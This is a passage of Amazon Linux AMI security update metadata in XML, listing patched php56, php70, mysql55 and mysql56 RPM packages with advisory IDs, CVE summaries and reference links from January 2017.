name="php56-xml" version="5.6.29" release="1.131.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-xml-5.6.29-1.131.amzn1.x86_64.rpm</filename></package><package name="php56-pspell" version="5.6.29" release="1.131.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-pspell-5.6.29-1.131.amzn1.x86_64.rpm</filename></package><package name="php56-soap" version="5.6.29" release="1.131.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-soap-5.6.29-1.131.amzn1.x86_64.rpm</filename></package><package name="php56-gmp" version="5.6.29" release="1.131.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-gmp-5.6.29-1.131.amzn1.x86_64.rpm</filename></package><package name="php56-enchant" version="5.6.29" release="1.131.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-enchant-5.6.29-1.131.amzn1.x86_64.rpm</filename></package><package name="php56-imap" version="5.6.29" release="1.131.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-imap-5.6.29-1.131.amzn1.x86_64.rpm</filename></package><package name="php56-debuginfo" version="5.6.29" release="1.131.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-debuginfo-5.6.29-1.131.amzn1.x86_64.rpm</filename></package><package name="php56-xmlrpc" version="5.6.29" release="1.131.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-xmlrpc-5.6.29-1.131.amzn1.x86_64.rpm</filename></package><package name="php56-bcmath" version="5.6.29" release="1.131.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-bcmath-5.6.29-1.131.amzn1.x86_64.rpm</filename></package><package name="php56-snmp" version="5.6.29" release="1.131.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-snmp-5.6.29-1.131.amzn1.x86_64.rpm</filename></package><package name="php56-intl" version="5.6.29" release="1.131.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-intl-5.6.29-1.131.amzn1.x86_64.rpm</filename></package><package name="php56-mbstring" version="5.6.29" release="1.131.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-mbstring-5.6.29-1.131.amzn1.x86_64.rpm</filename></package><package name="php56" version="5.6.29" release="1.131.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-5.6.29-1.131.amzn1.x86_64.rpm</filename></package><package name="php56-ldap" version="5.6.29" release="1.131.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-ldap-5.6.29-1.131.amzn1.x86_64.rpm</filename></package><package name="php56-fpm" version="5.6.29" release="1.131.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-fpm-5.6.29-1.131.amzn1.x86_64.rpm</filename></package><package name="php56-dbg" version="5.6.29" release="1.131.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-dbg-5.6.29-1.131.amzn1.x86_64.rpm</filename></package><package name="php56-cli" version="5.6.29" release="1.131.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-cli-5.6.29-1.131.amzn1.x86_64.rpm</filename></package><package name="php56-recode" version="5.6.29" release="1.131.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-recode-5.6.29-1.131.amzn1.x86_64.rpm</filename></package><package name="php56-dbg" version="5.6.29" release="1.131.amzn1" epoch="0" arch="i686"><filename>Packages/php56-dbg-5.6.29-1.131.amzn1.i686.rpm</filename></package><package name="php56-snmp" version="5.6.29" release="1.131.amzn1" epoch="0" arch="i686"><filename>Packages/php56-snmp-5.6.29-1.131.amzn1.i686.rpm</filename></package><package name="php56-pspell" version="5.6.29" release="1.131.amzn1" epoch="0" arch="i686"><filename>Packages/php56-pspell-5.6.29-1.131.amzn1.i686.rpm</filename></package><package name="php56-debuginfo" version="5.6.29" release="1.131.amzn1" epoch="0" arch="i686"><filename>Packages/php56-debuginfo-5.6.29-1.131.amzn1.i686.rpm</filename></package><package name="php56-cli" version="5.6.29" release="1.131.amzn1" epoch="0" arch="i686"><filename>Packages/php56-cli-5.6.29-1.131.amzn1.i686.rpm</filename></package><package name="php56-odbc" version="5.6.29" release="1.131.amzn1" epoch="0" arch="i686"><filename>Packages/php56-odbc-5.6.29-1.131.amzn1.i686.rpm</filename></package><package name="php56-mssql" version="5.6.29" release="1.131.amzn1" epoch="0" arch="i686"><filename>Packages/php56-mssql-5.6.29-1.131.amzn1.i686.rpm</filename></package><package name="php56-fpm" version="5.6.29" release="1.131.amzn1" epoch="0" arch="i686"><filename>Packages/php56-fpm-5.6.29-1.131.amzn1.i686.rpm</filename></package><package name="php56-imap" version="5.6.29" release="1.131.amzn1" epoch="0" arch="i686"><filename>Packages/php56-imap-5.6.29-1.131.amzn1.i686.rpm</filename></package><package name="php56" version="5.6.29" release="1.131.amzn1" epoch="0" arch="i686"><filename>Packages/php56-5.6.29-1.131.amzn1.i686.rpm</filename></package><package name="php56-opcache" version="5.6.29" release="1.131.amzn1" epoch="0" arch="i686"><filename>Packages/php56-opcache-5.6.29-1.131.amzn1.i686.rpm</filename></package><package name="php56-intl" version="5.6.29" release="1.131.amzn1" epoch="0" arch="i686"><filename>Packages/php56-intl-5.6.29-1.131.amzn1.i686.rpm</filename></package><package name="php56-gmp" version="5.6.29" release="1.131.amzn1" epoch="0" arch="i686"><filename>Packages/php56-gmp-5.6.29-1.131.amzn1.i686.rpm</filename></package><package name="php56-dba" version="5.6.29" release="1.131.amzn1" epoch="0" arch="i686"><filename>Packages/php56-dba-5.6.29-1.131.amzn1.i686.rpm</filename></package><package name="php56-mcrypt" version="5.6.29" release="1.131.amzn1" epoch="0" arch="i686"><filename>Packages/php56-mcrypt-5.6.29-1.131.amzn1.i686.rpm</filename></package><package name="php56-pdo" version="5.6.29" release="1.131.amzn1" epoch="0" arch="i686"><filename>Packages/php56-pdo-5.6.29-1.131.amzn1.i686.rpm</filename></package><package name="php56-mysqlnd" version="5.6.29" release="1.131.amzn1" epoch="0" arch="i686"><filename>Packages/php56-mysqlnd-5.6.29-1.131.amzn1.i686.rpm</filename></package><package name="php56-process" version="5.6.29" release="1.131.amzn1" epoch="0" arch="i686"><filename>Packages/php56-process-5.6.29-1.131.amzn1.i686.rpm</filename></package><package name="php56-devel" version="5.6.29" release="1.131.amzn1" epoch="0" arch="i686"><filename>Packages/php56-devel-5.6.29-1.131.amzn1.i686.rpm</filename></package><package name="php56-recode" version="5.6.29" release="1.131.amzn1" epoch="0" arch="i686"><filename>Packages/php56-recode-5.6.29-1.131.amzn1.i686.rpm</filename></package><package name="php56-bcmath" version="5.6.29" release="1.131.amzn1" epoch="0" arch="i686"><filename>Packages/php56-bcmath-5.6.29-1.131.amzn1.i686.rpm</filename></package><package name="php56-common" version="5.6.29" release="1.131.amzn1" epoch="0" arch="i686"><filename>Packages/php56-common-5.6.29-1.131.amzn1.i686.rpm</filename></package><package name="php56-pgsql" version="5.6.29" release="1.131.amzn1" epoch="0" arch="i686"><filename>Packages/php56-pgsql-5.6.29-1.131.amzn1.i686.rpm</filename></package><package name="php56-tidy" version="5.6.29" release="1.131.amzn1" epoch="0" arch="i686"><filename>Packages/php56-tidy-5.6.29-1.131.amzn1.i686.rpm</filename></package><package name="php56-enchant" version="5.6.29" release="1.131.amzn1" epoch="0" arch="i686"><filename>Packages/php56-enchant-5.6.29-1.131.amzn1.i686.rpm</filename></package><package name="php56-xml" version="5.6.29" release="1.131.amzn1" epoch="0" arch="i686"><filename>Packages/php56-xml-5.6.29-1.131.amzn1.i686.rpm</filename></package><package name="php56-ldap" version="5.6.29" release="1.131.amzn1" epoch="0" arch="i686"><filename>Packages/php56-ldap-5.6.29-1.131.amzn1.i686.rpm</filename></package><package name="php56-embedded" version="5.6.29" release="1.131.amzn1" epoch="0" arch="i686"><filename>Packages/php56-embedded-5.6.29-1.131.amzn1.i686.rpm</filename></package><package name="php56-mbstring" version="5.6.29" release="1.131.amzn1" epoch="0" arch="i686"><filename>Packages/php56-mbstring-5.6.29-1.131.amzn1.i686.rpm</filename></package><package name="php56-xmlrpc" version="5.6.29" release="1.131.amzn1" epoch="0" arch="i686"><filename>Packages/php56-xmlrpc-5.6.29-1.131.amzn1.i686.rpm</filename></package><package name="php56-soap" version="5.6.29" release="1.131.amzn1" epoch="0" arch="i686"><filename>Packages/php56-soap-5.6.29-1.131.amzn1.i686.rpm</filename></package><package name="php56-gd" version="5.6.29" release="1.131.amzn1" epoch="0" arch="i686"><filename>Packages/php56-gd-5.6.29-1.131.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2017-788</id><title>Amazon Linux AMI 2014.03 - ALAS-2017-788: medium priority package update for php70</title><issued date="2017-01-26 18:00:00" /><updated date="2017-01-26 18:00:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2016-9936:
The unserialize implementation in ext/standard/var.c in PHP 7.x before 7.0.14 allows remote attackers to cause a denial of service (use-after-free) or possibly have unspecified other impact via crafted serialized data. NOTE: this vulnerability exists because of an incomplete fix for CVE-2015-6834.
1404735:
CVE-2016-9936 php: Use After Free in unserialize()
CVE-2016-9935:
The php_wddx_push_element function in ext/wddx/wddx.c in PHP before 5.6.29 and 7.x before 7.0.14 allows remote attackers to cause a denial of service (out-of-bounds read and memory corruption) or possibly have unspecified other impact via an empty boolean element in a wddxPacket XML document.
1404731:
CVE-2016-9935 php: Invalid read when wddx decodes empty boolean element
CVE-2016-9934:
ext/wddx/wddx.c in PHP before 5.6.28 and 7.x before 7.0.13 allows remote attackers to cause a denial of service (NULL pointer dereference) via crafted serialized data in a wddxPacket XML document, as demonstrated by a PDORow string.
1404726:
CVE-2016-9934 php: NULL Pointer Dereference in WDDX Packet Deserialization with PDORow
CVE-2016-9933:
Stack consumption vulnerability in the gdImageFillToBorder function in gd.c in the GD Graphics Library (aka libgd) before 2.2.2, as used in PHP before 5.6.28 and 7.x before 7.0.13, allows remote attackers to cause a denial of service (segmentation violation) via a crafted imagefilltoborder call that triggers use of a negative color value.
1404723:
CVE-2016-9933 php, gd: Stack overflow in gdImageFillToBorder on truecolor images
CVE-2016-9137:
Use-after-free vulnerability in the CURLFile implementation in ext/curl/curl_file.c in PHP before 5.6.27 and 7.x before 7.0.12 allows remote attackers to cause a denial of service or possibly have unspecified other impact via crafted serialized data that is mishandled during __wakeup processing.
1391000:
CVE-2016-9137 php: Use after free in unserialize()
CVE-2016-7480:
The SplObjectStorage unserialize implementation in ext/spl/spl_observer.c in PHP before 7.0.12 does not verify that a key is an object, which allows remote attackers to execute arbitrary code or cause a denial of service (uninitialized memory access) via crafted serialized data.
1416499:
CVE-2016-7480 php: Use of uninitialized value in SplObjectStorag::unserialize
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-7480" title="" id="CVE-2016-7480" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-9137" title="" id="CVE-2016-9137" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-9933" title="" id="CVE-2016-9933" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-9934" title="" id="CVE-2016-9934" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-9935" title="" id="CVE-2016-9935" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-9936" title="" id="CVE-2016-9936" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="php70-embedded" version="7.0.14" release="1.20.amzn1" epoch="0" arch="x86_64"><filename>Packages/php70-embedded-7.0.14-1.20.amzn1.x86_64.rpm</filename></package><package name="php70-json" version="7.0.14" release="1.20.amzn1" epoch="0" arch="x86_64"><filename>Packages/php70-json-7.0.14-1.20.amzn1.x86_64.rpm</filename></package><package name="php70-pdo-dblib" version="7.0.14" release="1.20.amzn1" epoch="0" arch="x86_64"><filename>Packages/php70-pdo-dblib-7.0.14-1.20.amzn1.x86_64.rpm</filename></package><package name="php70-common" version="7.0.14" release="1.20.amzn1" epoch="0" arch="x86_64"><filename>Packages/php70-common-7.0.14-1.20.amzn1.x86_64.rpm</filename></package><package name="php70-intl" version="7.0.14" release="1.20.amzn1" epoch="0" arch="x86_64"><filename>Packages/php70-intl-7.0.14-1.20.amzn1.x86_64.rpm</filename></package><package name="php70-cli" version="7.0.14" release="1.20.amzn1" epoch="0" arch="x86_64"><filename>Packages/php70-cli-7.0.14-1.20.amzn1.x86_64.rpm</filename></package><package name="php70-soap" version="7.0.14" release="1.20.amzn1" epoch="0" arch="x86_64"><filename>Packages/php70-soap-7.0.14-1.20.amzn1.x86_64.rpm</filename></package><package name="php70-pspell" version="7.0.14" release="1.20.amzn1" epoch="0" arch="x86_64"><filename>Packages/php70-pspell-7.0.14-1.20.amzn1.x86_64.rpm</filename></package><package name="php70-xmlrpc" version="7.0.14" release="1.20.amzn1" epoch="0" arch="x86_64"><filename>Packages/php70-xmlrpc-7.0.14-1.20.amzn1.x86_64.rpm</filename></package><package name="php70-zip" version="7.0.14" release="1.20.amzn1" epoch="0" arch="x86_64"><filename>Packages/php70-zip-7.0.14-1.20.amzn1.x86_64.rpm</filename></package><package name="php70-enchant" version="7.0.14" release="1.20.amzn1" epoch="0" arch="x86_64"><filename>Packages/php70-enchant-7.0.14-1.20.amzn1.x86_64.rpm</filename></package><package name="php70-gd" version="7.0.14" release="1.20.amzn1" epoch="0" arch="x86_64"><filename>Packages/php70-gd-7.0.14-1.20.amzn1.x86_64.rpm</filename></package><package name="php70-mysqlnd" version="7.0.14" release="1.20.amzn1" epoch="0" arch="x86_64"><filename>Packages/php70-mysqlnd-7.0.14-1.20.amzn1.x86_64.rpm</filename></package><package name="php70-imap" version="7.0.14" release="1.20.amzn1" epoch="0" arch="x86_64"><filename>Packages/php70-imap-7.0.14-1.20.amzn1.x86_64.rpm</filename></package><package name="php70-recode" version="7.0.14" release="1.20.amzn1" epoch="0" arch="x86_64"><filename>Packages/php70-recode-7.0.14-1.20.amzn1.x86_64.rpm</filename></package><package name="php70-mcrypt" version="7.0.14" release="1.20.amzn1" epoch="0" arch="x86_64"><filename>Packages/php70-mcrypt-7.0.14-1.20.amzn1.x86_64.rpm</filename></package><package name="php70-gmp" version="7.0.14" release="1.20.amzn1" epoch="0" arch="x86_64"><filename>Packages/php70-gmp-7.0.14-1.20.amzn1.x86_64.rpm</filename></package><package name="php70-mbstring" version="7.0.14" release="1.20.amzn1" epoch="0" arch="x86_64"><filename>Packages/php70-mbstring-7.0.14-1.20.amzn1.x86_64.rpm</filename></package><package name="php70-xml" version="7.0.14" release="1.20.amzn1" epoch="0" arch="x86_64"><filename>Packages/php70-xml-7.0.14-1.20.amzn1.x86_64.rpm</filename></package><package name="php70-pdo" version="7.0.14" release="1.20.amzn1" epoch="0" arch="x86_64"><filename>Packages/php70-pdo-7.0.14-1.20.amzn1.x86_64.rpm</filename></package><package name="php70-pgsql" version="7.0.14" release="1.20.amzn1" epoch="0" arch="x86_64"><filename>Packages/php70-pgsql-7.0.14-1.20.amzn1.x86_64.rpm</filename></package><package name="php70-debuginfo" version="7.0.14" release="1.20.amzn1" epoch="0" arch="x86_64"><filename>Packages/php70-debuginfo-7.0.14-1.20.amzn1.x86_64.rpm</filename></package><package name="php70-dba" version="7.0.14" release="1.20.amzn1" epoch="0" arch="x86_64"><filename>Packages/php70-dba-7.0.14-1.20.amzn1.x86_64.rpm</filename></package><package name="php70-process" version="7.0.14" release="1.20.amzn1" epoch="0" arch="x86_64"><filename>Packages/php70-process-7.0.14-1.20.amzn1.x86_64.rpm</filename></package><package name="php70-devel" version="7.0.14" release="1.20.amzn1" epoch="0" arch="x86_64"><filename>Packages/php70-devel-7.0.14-1.20.amzn1.x86_64.rpm</filename></package><package name="php70-fpm" version="7.0.14" release="1.20.amzn1" epoch="0" arch="x86_64"><filename>Packages/php70-fpm-7.0.14-1.20.amzn1.x86_64.rpm</filename></package><package name="php70-ldap" version="7.0.14" release="1.20.amzn1" epoch="0" arch="x86_64"><filename>Packages/php70-ldap-7.0.14-1.20.amzn1.x86_64.rpm</filename></package><package name="php70-bcmath" version="7.0.14" release="1.20.amzn1" epoch="0" arch="x86_64"><filename>Packages/php70-bcmath-7.0.14-1.20.amzn1.x86_64.rpm</filename></package><package name="php70-opcache" version="7.0.14" release="1.20.amzn1" epoch="0" arch="x86_64"><filename>Packages/php70-opcache-7.0.14-1.20.amzn1.x86_64.rpm</filename></package><package name="php70-snmp" version="7.0.14" release="1.20.amzn1" epoch="0" arch="x86_64"><filename>Packages/php70-snmp-7.0.14-1.20.amzn1.x86_64.rpm</filename></package><package name="php70" version="7.0.14" release="1.20.amzn1" epoch="0" arch="x86_64"><filename>Packages/php70-7.0.14-1.20.amzn1.x86_64.rpm</filename></package><package name="php70-odbc" version="7.0.14" release="1.20.amzn1" epoch="0" arch="x86_64"><filename>Packages/php70-odbc-7.0.14-1.20.amzn1.x86_64.rpm</filename></package><package name="php70-tidy" version="7.0.14" release="1.20.amzn1" epoch="0" arch="x86_64"><filename>Packages/php70-tidy-7.0.14-1.20.amzn1.x86_64.rpm</filename></package><package name="php70-dbg" version="7.0.14" release="1.20.amzn1" epoch="0" arch="x86_64"><filename>Packages/php70-dbg-7.0.14-1.20.amzn1.x86_64.rpm</filename></package><package name="php70-pspell" version="7.0.14" release="1.20.amzn1" epoch="0" arch="i686"><filename>Packages/php70-pspell-7.0.14-1.20.amzn1.i686.rpm</filename></package><package name="php70-bcmath" version="7.0.14" release="1.20.amzn1" epoch="0" arch="i686"><filename>Packages/php70-bcmath-7.0.14-1.20.amzn1.i686.rpm</filename></package><package name="php70-mbstring" version="7.0.14" release="1.20.amzn1" epoch="0" arch="i686"><filename>Packages/php70-mbstring-7.0.14-1.20.amzn1.i686.rpm</filename></package><package name="php70-mysqlnd" version="7.0.14" release="1.20.amzn1" epoch="0" arch="i686"><filename>Packages/php70-mysqlnd-7.0.14-1.20.amzn1.i686.rpm</filename></package><package name="php70" version="7.0.14" release="1.20.amzn1" epoch="0" arch="i686"><filename>Packages/php70-7.0.14-1.20.amzn1.i686.rpm</filename></package><package name="php70-mcrypt" version="7.0.14" release="1.20.amzn1" epoch="0" arch="i686"><filename>Packages/php70-mcrypt-7.0.14-1.20.amzn1.i686.rpm</filename></package><package name="php70-imap" version="7.0.14" release="1.20.amzn1" epoch="0" arch="i686"><filename>Packages/php70-imap-7.0.14-1.20.amzn1.i686.rpm</filename></package><package name="php70-intl" version="7.0.14" release="1.20.amzn1" epoch="0" arch="i686"><filename>Packages/php70-intl-7.0.14-1.20.amzn1.i686.rpm</filename></package><package name="php70-xmlrpc" version="7.0.14" release="1.20.amzn1" epoch="0" arch="i686"><filename>Packages/php70-xmlrpc-7.0.14-1.20.amzn1.i686.rpm</filename></package><package name="php70-enchant" version="7.0.14" release="1.20.amzn1" epoch="0" arch="i686"><filename>Packages/php70-enchant-7.0.14-1.20.amzn1.i686.rpm</filename></package><package name="php70-debuginfo" version="7.0.14" release="1.20.amzn1" epoch="0" arch="i686"><filename>Packages/php70-debuginfo-7.0.14-1.20.amzn1.i686.rpm</filename></package><package name="php70-embedded" version="7.0.14" release="1.20.amzn1" epoch="0" arch="i686"><filename>Packages/php70-embedded-7.0.14-1.20.amzn1.i686.rpm</filename></package><package name="php70-zip" version="7.0.14" release="1.20.amzn1" epoch="0" arch="i686"><filename>Packages/php70-zip-7.0.14-1.20.amzn1.i686.rpm</filename></package><package name="php70-dbg" version="7.0.14" release="1.20.amzn1" epoch="0" arch="i686"><filename>Packages/php70-dbg-7.0.14-1.20.amzn1.i686.rpm</filename></package><package name="php70-soap" version="7.0.14" release="1.20.amzn1" epoch="0" arch="i686"><filename>Packages/php70-soap-7.0.14-1.20.amzn1.i686.rpm</filename></package><package name="php70-snmp" version="7.0.14" release="1.20.amzn1" epoch="0" arch="i686"><filename>Packages/php70-snmp-7.0.14-1.20.amzn1.i686.rpm</filename></package><package name="php70-common" version="7.0.14" release="1.20.amzn1" epoch="0" arch="i686"><filename>Packages/php70-common-7.0.14-1.20.amzn1.i686.rpm</filename></package><package name="php70-gd" version="7.0.14" release="1.20.amzn1" epoch="0" arch="i686"><filename>Packages/php70-gd-7.0.14-1.20.amzn1.i686.rpm</filename></package><package name="php70-ldap" version="7.0.14" release="1.20.amzn1" epoch="0" arch="i686"><filename>Packages/php70-ldap-7.0.14-1.20.amzn1.i686.rpm</filename></package><package name="php70-gmp" version="7.0.14" release="1.20.amzn1" epoch="0" arch="i686"><filename>Packages/php70-gmp-7.0.14-1.20.amzn1.i686.rpm</filename></package><package name="php70-cli" version="7.0.14" release="1.20.amzn1" epoch="0" arch="i686"><filename>Packages/php70-cli-7.0.14-1.20.amzn1.i686.rpm</filename></package><package name="php70-devel" version="7.0.14" release="1.20.amzn1" epoch="0" arch="i686"><filename>Packages/php70-devel-7.0.14-1.20.amzn1.i686.rpm</filename></package><package name="php70-tidy" version="7.0.14" release="1.20.amzn1" epoch="0" arch="i686"><filename>Packages/php70-tidy-7.0.14-1.20.amzn1.i686.rpm</filename></package><package name="php70-xml" version="7.0.14" release="1.20.amzn1" epoch="0" arch="i686"><filename>Packages/php70-xml-7.0.14-1.20.amzn1.i686.rpm</filename></package><package name="php70-pdo" version="7.0.14" release="1.20.amzn1" epoch="0" arch="i686"><filename>Packages/php70-pdo-7.0.14-1.20.amzn1.i686.rpm</filename></package><package name="php70-dba" version="7.0.14" release="1.20.amzn1" epoch="0" arch="i686"><filename>Packages/php70-dba-7.0.14-1.20.amzn1.i686.rpm</filename></package><package name="php70-process" version="7.0.14" release="1.20.amzn1" epoch="0" arch="i686"><filename>Packages/php70-process-7.0.14-1.20.amzn1.i686.rpm</filename></package><package name="php70-recode" version="7.0.14" release="1.20.amzn1" epoch="0" arch="i686"><filename>Packages/php70-recode-7.0.14-1.20.amzn1.i686.rpm</filename></package><package name="php70-pgsql" version="7.0.14" release="1.20.amzn1" epoch="0" arch="i686"><filename>Packages/php70-pgsql-7.0.14-1.20.amzn1.i686.rpm</filename></package><package name="php70-pdo-dblib" version="7.0.14" release="1.20.amzn1" epoch="0" arch="i686"><filename>Packages/php70-pdo-dblib-7.0.14-1.20.amzn1.i686.rpm</filename></package><package name="php70-fpm" version="7.0.14" release="1.20.amzn1" epoch="0" arch="i686"><filename>Packages/php70-fpm-7.0.14-1.20.amzn1.i686.rpm</filename></package><package name="php70-opcache" version="7.0.14" release="1.20.amzn1" epoch="0" arch="i686"><filename>Packages/php70-opcache-7.0.14-1.20.amzn1.i686.rpm</filename></package><package name="php70-json" version="7.0.14" release="1.20.amzn1" epoch="0" arch="i686"><filename>Packages/php70-json-7.0.14-1.20.amzn1.i686.rpm</filename></package><package name="php70-odbc" version="7.0.14" release="1.20.amzn1" epoch="0" arch="i686"><filename>Packages/php70-odbc-7.0.14-1.20.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2017-789</id><title>Amazon Linux AMI 2014.03 - ALAS-2017-789: medium priority package update for mysql55</title><issued date="2017-01-26 18:00:00" /><updated date="2017-01-26 18:00:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2017-3318:
1414357:
CVE-2017-3318 mysql: Server: Error Handling unspecified vulnerability (CPU Jan 2017)
CVE-2017-3317:
1414355:
CVE-2017-3317 mysql: Logging unspecified vulnerability (CPU Jan 2017)
CVE-2017-3313:
1414353:
CVE-2017-3313 mysql: Server: MyISAM unspecified vulnerability (CPU Jan 2017)
CVE-2017-3258:
1414351:
CVE-2017-3258 mysql: Server: DDL unspecified vulnerability (CPU Jan 2017)
CVE-2017-3244:
1414342:
CVE-2017-3244 mysql: Server: DML unspecified vulnerability (CPU Jan 2017)
CVE-2017-3243:
1414340:
CVE-2017-3243 mysql: Server: Charsets unspecified vulnerability (CPU Jan 2017)
CVE-2017-3238:
1414338:
CVE-2017-3238 mysql: Server: Optimizer unspecified vulnerability (CPU Jan 2017)
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-3238" title="" id="CVE-2017-3238" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-3243" title="" id="CVE-2017-3243" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-3244" title="" id="CVE-2017-3244" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-3258" title="" id="CVE-2017-3258" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-3313" title="" id="CVE-2017-3313" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-3317" title="" id="CVE-2017-3317" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-3318" title="" id="CVE-2017-3318" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="mysql55-test" version="5.5.54" release="1.16.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql55-test-5.5.54-1.16.amzn1.x86_64.rpm</filename></package><package name="mysql55-server" version="5.5.54" release="1.16.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql55-server-5.5.54-1.16.amzn1.x86_64.rpm</filename></package><package name="mysql55" version="5.5.54" release="1.16.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql55-5.5.54-1.16.amzn1.x86_64.rpm</filename></package><package name="mysql55-bench" version="5.5.54" release="1.16.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql55-bench-5.5.54-1.16.amzn1.x86_64.rpm</filename></package><package name="mysql55-embedded-devel" version="5.5.54" release="1.16.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql55-embedded-devel-5.5.54-1.16.amzn1.x86_64.rpm</filename></package><package name="mysql55-embedded" version="5.5.54" release="1.16.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql55-embedded-5.5.54-1.16.amzn1.x86_64.rpm</filename></package><package name="mysql55-libs" version="5.5.54" release="1.16.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql55-libs-5.5.54-1.16.amzn1.x86_64.rpm</filename></package><package name="mysql-config" version="5.5.54" release="1.16.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql-config-5.5.54-1.16.amzn1.x86_64.rpm</filename></package><package name="mysql55-devel" version="5.5.54" release="1.16.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql55-devel-5.5.54-1.16.amzn1.x86_64.rpm</filename></package><package name="mysql55-debuginfo" version="5.5.54" release="1.16.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql55-debuginfo-5.5.54-1.16.amzn1.x86_64.rpm</filename></package><package name="mysql-config" version="5.5.54" release="1.16.amzn1" epoch="0" arch="i686"><filename>Packages/mysql-config-5.5.54-1.16.amzn1.i686.rpm</filename></package><package name="mysql55-devel" version="5.5.54" release="1.16.amzn1" epoch="0" arch="i686"><filename>Packages/mysql55-devel-5.5.54-1.16.amzn1.i686.rpm</filename></package><package name="mysql55-embedded-devel" version="5.5.54" release="1.16.amzn1" epoch="0" arch="i686"><filename>Packages/mysql55-embedded-devel-5.5.54-1.16.amzn1.i686.rpm</filename></package><package name="mysql55" version="5.5.54" release="1.16.amzn1" epoch="0" arch="i686"><filename>Packages/mysql55-5.5.54-1.16.amzn1.i686.rpm</filename></package><package name="mysql55-bench" version="5.5.54" release="1.16.amzn1" epoch="0" arch="i686"><filename>Packages/mysql55-bench-5.5.54-1.16.amzn1.i686.rpm</filename></package><package name="mysql55-server" version="5.5.54" release="1.16.amzn1" epoch="0" arch="i686"><filename>Packages/mysql55-server-5.5.54-1.16.amzn1.i686.rpm</filename></package><package name="mysql55-embedded" version="5.5.54" release="1.16.amzn1" epoch="0" arch="i686"><filename>Packages/mysql55-embedded-5.5.54-1.16.amzn1.i686.rpm</filename></package><package name="mysql55-debuginfo" version="5.5.54" release="1.16.amzn1" epoch="0" arch="i686"><filename>Packages/mysql55-debuginfo-5.5.54-1.16.amzn1.i686.rpm</filename></package><package name="mysql55-test" version="5.5.54" release="1.16.amzn1" epoch="0" arch="i686"><filename>Packages/mysql55-test-5.5.54-1.16.amzn1.i686.rpm</filename></package><package name="mysql55-libs" version="5.5.54" release="1.16.amzn1" epoch="0" arch="i686"><filename>Packages/mysql55-libs-5.5.54-1.16.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2017-790</id><title>Amazon Linux AMI 2014.03 - ALAS-2017-790: medium priority package update for mysql56</title><issued date="2017-01-26 18:00:00" /><updated date="2017-01-26 18:00:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2017-3318:
1414357:
CVE-2017-3318 mysql: Server: Error Handling unspecified vulnerability (CPU Jan 2017)
CVE-2017-3317:
1414355:
CVE-2017-3317 mysql: Logging unspecified vulnerability (CPU Jan 2017)
CVE-2017-3313:
1414353:
CVE-2017-3313 mysql: Server: MyISAM unspecified vulnerability (CPU Jan 2017)
CVE-2017-3273:
1414352:
CVE-2017-3273 mysql: Server: DDL unspecified vulnerability (CPU Jan 2017)
CVE-2017-3258:
1414351:
CVE-2017-3258 mysql: Server: DDL unspecified vulnerability (CPU Jan 2017)
CVE-2017-3257:
1414350:
CVE-2017-3257 mysql: Server: InnoDB unspecified vulnerability (CPU Jan 2017)
CVE-2017-3244:
1414342:
CVE-2017-3244 mysql: Server: DML unspecified vulnerability (CPU Jan 2017)
CVE-2017-3238:
1414338:
